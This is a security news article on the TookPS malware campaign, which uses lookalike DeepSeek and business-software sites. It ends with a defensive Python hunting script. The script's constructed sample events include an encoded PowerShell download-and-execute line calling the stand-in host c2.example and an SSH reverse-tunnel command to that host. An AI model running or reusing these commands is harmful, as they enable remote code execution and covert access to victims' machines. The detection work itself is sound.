Cybersecurity researchers have identified a malware campaign that uses the popularity of DeepSeek, a Chinese AI chatbot, and of several remote desktop applications as lures to distribute the TookPS malware. The campaign illustrates a recurring tactic: attackers attach themselves to whatever technology is trending in order to get users to run a malicious installer, then use that foothold to take control of the system and whatever data it holds.
DeepSeek’s Rise and Associated Cyber Threats
DeepSeek, often referred to as the ChatGPT of China, has rapidly gained prominence in the AI landscape. Its low cost and strong performance have attracted a substantial user base, and that user base is what makes it attractive to attackers: a large pool of people actively searching for a download is exactly what a lookalike site needs. In January 2025, DeepSeek reported large-scale malicious attacks that forced it to restrict new user registrations, an early sign of how quickly the service had become a target. ([apnews.com](https://apnews.com/article/be414acadbf35070d7645fe9fbd8f464?utm_source=openai))
Malware Campaign Overview
The TookPS malware campaign initially utilized DeepSeek as a lure to entice users into downloading malicious software. However, the campaign has since expanded its scope, impersonating legitimate business tools such as UltraViewer, AutoCAD, and SketchUp. By creating fraudulent websites that mimic official sources, attackers deceive users into downloading compromised versions of these applications.
Infection Mechanism and Persistence
Upon execution, the TookPS malware establishes communication with command and control (C2) servers using domains registered in early 2024. The malware retrieves base64-encoded PowerShell scripts that facilitate persistent access to the compromised system. The infection chain involves multiple stages:
1. Initial Infection: The user downloads and executes a malicious file disguised as a legitimate application.
2. C2 Communication: The malware contacts its C2 servers to download additional PowerShell scripts.
3. SSH Tunnel Establishment: The scripts download SSH components and set up a covert tunnel between the infected device and the attacker’s server, giving the attacker remote access to the host over a channel that looks like ordinary outbound SSH.
4. Deployment of Backdoors: Modified versions of known backdoors, such as Backdoor.Win32.TeviRat, are deployed using DLL sideloading: the malicious DLL is placed where legitimate remote access software such as TeamViewer will load it, so the backdoor runs inside a trusted, signed process and inherits its reputation with security tools.
Technical Analysis of the SSH Tunnel
A critical component of TookPS is the SSH tunnel that gives attackers full access to the system. The PowerShell stage executes commands to start an SSH server and create a tunnel between the infected device and the attacker’s remote server. For authentication it uses the RSA key downloaded earlier, and it reads its connection parameters from a separate config file rather than passing them on the command line. Because the connection is initiated from the infected host, it typically passes NAT and egress filtering that permits outbound SSH; once established, the attacker can execute arbitrary commands through it and retain access for as long as the tunnel is re-created on each boot. For defenders, the artefacts to look for are an SSH binary and private key dropped into a user-writable directory, an SSH process launched by PowerShell, and remote-forwarding options on its command line.
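The infection chain and the tunnel described above can be hunted for in endpoint telemetry. The following is an added example, not code from the original page or from the analysts who documented TookPS: a small Python detector run over constructed process-creation and image-load records shaped like Sysmon Event ID 1 and Event ID 7. It decodes a `-EncodedCommand` PowerShell payload to look for download-and-execute behaviour, flags an `ssh.exe` launched with remote forwarding (`-R`) or a key from a user-writable path, and flags TeamViewer loading an unsigned DLL from a user-writable directory (the sideloading pattern). All paths, hostnames and the encoded script are hypothetical and built inline; the rules encode the behaviours the text describes, not any indicator from the campaign itself.

```python
"""Hunt for a TookPS-style chain in process-creation / image-load telemetry.

Illustrative detector; the events below are constructed to resemble Sysmon
Event ID 1 (process create) and Event ID 7 (image load) fields. Every path,
hostname and payload here is hypothetical.
"""
import base64
import re

# Constructed stage-2 loader, base64-encoded as UTF-16LE exactly the way
# powershell.exe expects for -EncodedCommand.
SAMPLE_SCRIPT = 'IEX (New-Object Net.WebClient).DownloadString("http://c2.example/stage2.ps1")'
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

EVENTS = [  # constructed sample telemetry, in execution order
    {"id": 1, "image": r"C:\Users\victim\Downloads\UltraViewer_setup.exe",
     "cmdline": r'"C:\Users\victim\Downloads\UltraViewer_setup.exe"',
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENCODED}",
     "parent": r"C:\Users\victim\Downloads\UltraViewer_setup.exe"},
    {"id": 1, "image": r"C:\ProgramData\ssh\ssh.exe",
     "cmdline": r"C:\ProgramData\ssh\ssh.exe -N -R 0.0.0.0:5555:127.0.0.1:3389 "
                r"-i C:\ProgramData\ssh\id_rsa -F C:\ProgramData\ssh\config tunnel@c2.example",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 7, "image": r"C:\Users\victim\AppData\Local\Temp\tv\TeamViewer.exe",
     "loaded": r"C:\Users\victim\AppData\Local\Temp\tv\TV.dll", "signed": False},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1",   # benign control
     "parent": r"C:\Windows\System32\svchost.exe"},
]

# Directories an ordinary user can write to; binaries, keys and DLLs here are suspect.
WRITABLE = re.compile(r"(?i)\\(?:Users\\[^\\]+\\(?:AppData|Downloads)|ProgramData|Windows\\Temp|Users\\Public)\\")
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
SUSPICIOUS_PS = ("FromBase64String", "DownloadString", "DownloadFile", "IEX", "Invoke-Expression")
REMOTE_TOOLS = ("\\teamviewer.exe",)  # extend with other remote-access executables as needed


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or odd byte count for UTF-16
        return None


def check_process(ev):
    findings = []
    image, cmd = ev["image"].lower(), ev.get("cmdline", "")
    if image.endswith("powershell.exe"):
        script = decode_encoded_command(cmd)
        if script is not None:
            hits = [k for k in SUSPICIOUS_PS if k.lower() in script.lower()]
            if hits:
                findings.append(("encoded_powershell_downloader", ev["image"],
                                 f"{', '.join(hits)}: {script[:60]}"))
    if image.endswith(("\\ssh.exe", "\\sshd.exe")):
        reasons = []
        if re.search(r"(?:^|\s)-R\s", cmd):            # -R is remote (reverse) forwarding
            reasons.append("remote forwarding")
        key = re.search(r"(?:^|\s)-i\s+(\S+)", cmd)
        if key and WRITABLE.search(key.group(1)):
            reasons.append("key in user-writable path")
        if WRITABLE.search(ev["image"]):
            reasons.append("ssh binary in user-writable path")
        if reasons:
            findings.append(("ssh_reverse_tunnel", ev["image"], "; ".join(reasons)))
    return findings


def check_image_load(ev):
    """Remote-access tool loading an unsigned DLL from a writable directory = sideload."""
    if ev["image"].lower().endswith(REMOTE_TOOLS):
        dll = ev["loaded"]
        if WRITABLE.search(dll) and not ev.get("signed", True):
            return [("dll_sideload_remote_tool", ev["image"], dll)]
    return []


def analyze(events):
    findings = []
    for ev in events:
        if ev["id"] == 1:
            findings.extend(check_process(ev))
        elif ev["id"] == 7:
            findings.extend(check_image_load(ev))
    return findings


if __name__ == "__main__":
    for rule, image, detail in analyze(EVENTS):
        print(f"[{rule}] {image}\n    {detail}")
```

Run against the sample, the detector reports the encoded downloader, the reverse tunnel and the sideloaded DLL, and stays silent on the benign `-File` invocation. In a real deployment the parent-child relationships would carry additional weight (an installer from Downloads spawning hidden PowerShell, PowerShell spawning `ssh.exe`), and the writable-path list should be tuned to the environment.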
Broader Implications and Related Threats
The exploitation of DeepSeek is not an isolated incident. Cybercriminals have also been observed buying Google Ads that target people searching for DeepSeek, directing them to malicious websites that distribute malware. Additionally, fake DeepSeek-themed websites have been set up to steal credentials, harvest browser cookies, and drain cryptocurrency wallets. ([cybersecuritynews.com](https://cybersecuritynews.com/weaponized-google-ads-attacking-deepseek-users/?utm_source=openai), [cybernews.com](https://cybernews.com/security/deepseek-captcha-info-stealing-malware/?utm_source=openai))
Recommendations for Users and Organizations
To mitigate the risks associated with such sophisticated malware campaigns, users and organizations are advised to:
– Verify Sources: Download software only from the vendor’s official site, reached by typing the address rather than following a search result, and check the publisher’s code signature on an installer before running it.
– Exercise Caution with Ads: Be wary of sponsored search results and advertisements, as they may lead to malicious websites.
– Implement Security Measures: Deploy endpoint protection and monitor for the behaviours this campaign exhibits: encoded PowerShell launched by a freshly installed application, SSH binaries and private keys appearing in user-writable directories, outbound SSH tunnels with remote forwarding, and remote access tools loading DLLs from unexpected locations.
– Stay Informed: Keep abreast of the latest cybersecurity threats and tactics employed by cybercriminals.
By adopting these practices, users can enhance their security posture and reduce the likelihood of falling victim to such malicious campaigns.